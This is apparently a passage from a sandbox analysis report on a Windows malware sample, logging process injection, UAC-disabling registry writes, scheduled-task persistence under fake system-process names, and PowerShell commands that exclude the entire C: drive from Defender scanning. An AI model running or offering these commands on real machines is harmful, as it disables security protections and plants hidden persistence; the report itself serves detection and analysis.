Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2380 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 2380 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 2380 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 1792 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1792 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1792 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 2612 wrote to memory of 1956 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1956 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1956 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1916 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1916 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1916 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 2180 wrote to memory of 1740 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1740 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1740 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1576 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1576 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1576 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Downloads\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default\Downloads\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Downloads\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Google\Update\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\Update\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Windows\LiveKernelReports\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Admin\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\ShellNew\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\ShellNew\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\ShellNew\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Windows\debug\WIA\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\debug\WIA\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Windows\debug\WIA\smss.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZulfStaN0H.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

"C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7ffff686-4516-46fa-9f0d-2e8ef0881a28.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\023fb7b8-b690-4d75-b756-fba66941e125.vbs"

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28d0c9de-bce9-431f-b7c4-b0c31daffd5d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a34004e5-db2d-4197-a3fe-47162cebb188.vbs"

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Windows\System32\WScript.exe

